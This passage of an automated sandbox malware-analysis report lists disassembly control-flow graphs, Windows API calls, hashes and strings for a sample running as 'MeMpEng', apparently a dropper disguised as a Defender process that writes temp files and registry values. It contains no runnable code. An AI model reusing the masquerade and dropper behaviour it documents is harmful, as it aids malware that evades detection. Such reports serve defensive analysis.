                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$STy
                                                          • API String ID: 551687249-2882605797
                                                          • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                          • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                                          • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                          • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 715 402711-40272a call 402da9 718 402730-402737 715->718 719 402c4f-402c52 715->719 720 402739 718->720 721 40273c-40273f 718->721 722 402c58-402c5e 719->722 720->721 723 4028a3-4028ab 721->723 724 402745-402754 call 4064b4 721->724 723->719 724->723 728 40275a 724->728 729 402760-402764 728->729 730 4027f9-4027fc 729->730 731 40276a-402785 ReadFile 729->731 733 402814-402824 call 4060c7 730->733 734 4027fe-402801 730->734 731->723 732 40278b-402790 731->732 732->723 736 402796-4027a4 732->736 733->723 742 402826 733->742 734->733 737 402803-40280e call 406125 734->737 739 4027aa-4027bc MultiByteToWideChar 736->739 740 40285f-40286b call 40649b 736->740 737->723 737->733 739->742 743 4027be-4027c1 739->743 740->722 746 402829-40282c 742->746 747 4027c3-4027ce 743->747 746->740 749 40282e-402833 746->749 747->746 750 4027d0-4027f5 SetFilePointer MultiByteToWideChar 747->750 751 402870-402874 749->751 752 402835-40283a 749->752 750->747 753 4027f7 750->753 755 402891-40289d SetFilePointer 751->755 756 402876-40287a 751->756 752->751 754 40283c-40284f 752->754 753->742 754->723 757 402851-402857 754->757 755->723 758 402882-40288f 756->758 759 40287c-402880 756->759 757->729 760 40285d 757->760 758->723 759->755 759->758 760->723
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                            • Part of subcall function 00406125: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026F6,00000000,00000000,?,00000000,00000011), ref: 0040613B
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                                          • Instruction ID: 94532b36e9b1b55a0417b46d3f551769048a354c57792839695d4204f468be83
                                                          • Opcode Fuzzy Hash: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                                          • Instruction Fuzzy Hash: D6510C75D04119AADF20EFD4CA84AAEBBB9FF44304F14817BE541B62D0D7B89D82CB58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 761 4068d8-4068f8 GetSystemDirectoryW 762 4068fa 761->762 763 4068fc-4068fe 761->763 762->763 764 406900-406909 763->764 765 40690f-406911 763->765 764->765 766 40690b-40690d 764->766 767 406912-406945 wsprintfW LoadLibraryExW 765->767 766->767
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                          • wsprintfW.USER32 ref: 0040692A
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040693E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME
                                                          • API String ID: 2200240437-1106614640
                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 768 6a2b1817-6a2b1856 call 6a2b1bff 772 6a2b185c-6a2b1860 768->772 773 6a2b1976-6a2b1978 768->773 774 6a2b1869-6a2b1876 call 6a2b2480 772->774 775 6a2b1862-6a2b1868 call 6a2b243e 772->775 780 6a2b1878-6a2b187d 774->780 781 6a2b18a6-6a2b18ad 774->781 775->774 784 6a2b1898-6a2b189b 780->784 785 6a2b187f-6a2b1880 780->785 782 6a2b18af-6a2b18cb call 6a2b2655 call 6a2b1654 call 6a2b1312 GlobalFree 781->782 783 6a2b18cd-6a2b18d1 781->783 809 6a2b1925-6a2b1929 782->809 786 6a2b191e-6a2b1924 call 6a2b2655 783->786 787 6a2b18d3-6a2b191c call 6a2b1666 call 6a2b2655 783->787 784->781 788 6a2b189d-6a2b189e call 6a2b2e23 784->788 790 6a2b1888-6a2b1889 call 6a2b2b98 785->790 791 6a2b1882-6a2b1883 785->791 786->809 787->809 803 6a2b18a3 788->803 800 6a2b188e 790->800 792 6a2b1890-6a2b1896 call 6a2b2810 791->792 793 6a2b1885-6a2b1886 791->793 808 6a2b18a5 792->808 793->781 793->790 800->803 803->808 808->781 812 6a2b192b-6a2b1939 call 6a2b2618 809->812 813 6a2b1966-6a2b196d 809->813 818 6a2b193b-6a2b193e 812->818 819 6a2b1951-6a2b1958 812->819 813->773 815 6a2b196f-6a2b1970 GlobalFree 813->815 815->773 818->819 820 6a2b1940-6a2b1948 818->820 819->813 821 6a2b195a-6a2b1965 call 6a2b15dd 819->821 820->819 822 6a2b194a-6a2b194b FreeLibrary 820->822 821->813 822->819
                                                          APIs
                                                            • Part of subcall function 6A2B1BFF: GlobalFree.KERNEL32(?), ref: 6A2B1E74
                                                            • Part of subcall function 6A2B1BFF: GlobalFree.KERNEL32(?), ref: 6A2B1E79
                                                            • Part of subcall function 6A2B1BFF: GlobalFree.KERNEL32(?), ref: 6A2B1E7E
                                                          • GlobalFree.KERNEL32(00000000), ref: 6A2B18C5
                                                          • FreeLibrary.KERNEL32(?), ref: 6A2B194B
                                                          • GlobalFree.KERNEL32(00000000), ref: 6A2B1970
                                                            • Part of subcall function 6A2B243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6A2B246F
                                                            • Part of subcall function 6A2B2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6A2B1896,00000000), ref: 6A2B28E0
                                                            • Part of subcall function 6A2B1666: wsprintfW.USER32 ref: 6A2B1694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: eed3fdaf0c07325c8a9d677e498f27d506b880e119b0c9e410ba2127894f7707
                                                          • Instruction ID: 3823856e0fa82bf0fc9b6e436030fb1390c9427ab5584e80a334201ad09ad216
                                                          • Opcode Fuzzy Hash: eed3fdaf0c07325c8a9d677e498f27d506b880e119b0c9e410ba2127894f7707
                                                          • Instruction Fuzzy Hash: AF41C1B188034EABEB149F24D98CB8577A8BF063DDF054465EA559A087DF74D4C4C770

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 825 4024af-4024e0 call 402dcb * 2 call 402e5b 832 4024e6-4024f0 825->832 833 402c4f-402c5e 825->833 834 4024f2-4024ff call 402dcb lstrlenW 832->834 835 402503-402506 832->835 834->835 838 402508-402519 call 402da9 835->838 839 40251a-40251d 835->839 838->839 843 40252e-402542 RegSetValueExW 839->843 844 40251f-402529 call 4032d9 839->844 847 402544 843->847 848 402547-402628 RegCloseKey 843->848 844->843 847->848 848->833
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn59E.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024FA
                                                          • RegSetValueExW.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn59E.tmp,00000000), ref: 0040253A
                                                          • RegCloseKey.KERNEL32(?), ref: 00402622
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsn59E.tmp
                                                          • API String ID: 2655323295-2107627725
                                                          • Opcode ID: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                                          • Instruction ID: b5124b365774ee0dd77fffeda1a995c18ababb59e8a55150708f98195cc7d2d6
                                                          • Opcode Fuzzy Hash: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                                          • Instruction Fuzzy Hash: B8117231D00114BEDB01EFA59E59AAEB6B4EF54358F20443FF504B61D1C7B88E40966C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 850 406073-40607f 851 406080-4060b4 GetTickCount GetTempFileNameW 850->851 852 4060c3-4060c5 851->852 853 4060b6-4060b8 851->853 854 4060bd-4060c0 852->854 853->851 855 4060ba 853->855 855->854
                                                          APIs
                                                          • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008), ref: 00406091
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-4262883142
                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768
                                                          APIs
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(?), ref: 00405EDC
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                            • Part of subcall function 00405AA8: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405AEA
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive,?,00000000,000000F0), ref: 00401672
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive, xrefs: 00401665
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive
                                                          • API String ID: 1892508949-2785362531
                                                          • Opcode ID: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                                          • Instruction ID: 2b03c7a92312b5a1b0d009ad41e3f6a941738229f321331d68055a18e38198b9
                                                          • Opcode Fuzzy Hash: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                                          • Instruction Fuzzy Hash: 4511D031504514EBCF207FA5CD056AF36A0EF04368B25493FE941B22F1D63D4A81DA5E
                                                          APIs
                                                          • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00000800), ref: 00406468
                                                          • RegCloseKey.KERNEL32(?), ref: 00406473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                            • Part of subcall function 004055D9: lstrcatW.KERNEL32 ref: 00405634
                                                            • Part of subcall function 004055D9: SetWindowTextW.USER32 ref: 00405646
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                                          • Instruction ID: 73d72cb5994b484f29e4ff80cb350354ef05bb92eb19bb99874f54bc55697afd
                                                          • Opcode Fuzzy Hash: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                                          • Instruction Fuzzy Hash: EF21A131904104EACF10AFA5CF89A9E7A71BF54359F30413FF105B91E5DBBD89829A2E
                                                          APIs
                                                          • GlobalFree.KERNEL32(00908338), ref: 00401C30
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
